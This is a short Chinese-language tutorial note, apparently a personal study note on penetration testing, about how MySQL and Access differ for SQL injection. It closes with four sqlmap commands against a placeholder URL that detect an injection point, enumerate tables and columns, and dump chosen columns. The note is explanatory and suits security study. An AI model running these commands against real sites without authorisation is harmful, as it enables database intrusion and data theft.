数据库管理系统对SQL注入的影响

Why

首先说明为什么不同呢？不同数据库管理系统基本的SQL语句相同，但是支持的某些函数，数据库的整体结构和组织方式是不相同的。比如mysql数据库中特有的information_schema数据库，里面存有所有的数据库名称，以及各个数据库中表的名称等等信息。

对SQL注入的影响

数据库管理系统的不同导致SQL注入时，进行利用的方式和难度不相同，Mysql数据库中直接通过version()等函数以及infomation_schema数据库得到数据库版本，用户名以及所有数据库的信息。但access就不能通过这些方式。

SqlMAP对不同数据库的处理

SqlMap在对access数据库进行处理时，不能使用-dbs等选项，进行数据表的枚举时，采用的是暴力破解的方式，字典位于txt/common-tables.txt中。

SqlMAP对Access数据库架构网站注入的步骤如下：

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --tables //枚举表

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3  --columns -T  "tablename"   // 枚举列名

sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --dump -C "name1, name2" -T "tablename" //获取name1, name 2列的数据

SqlMAP对mysql数据的注入步骤见《metasploit渗透测试魔鬼训练营》 之 SQL注入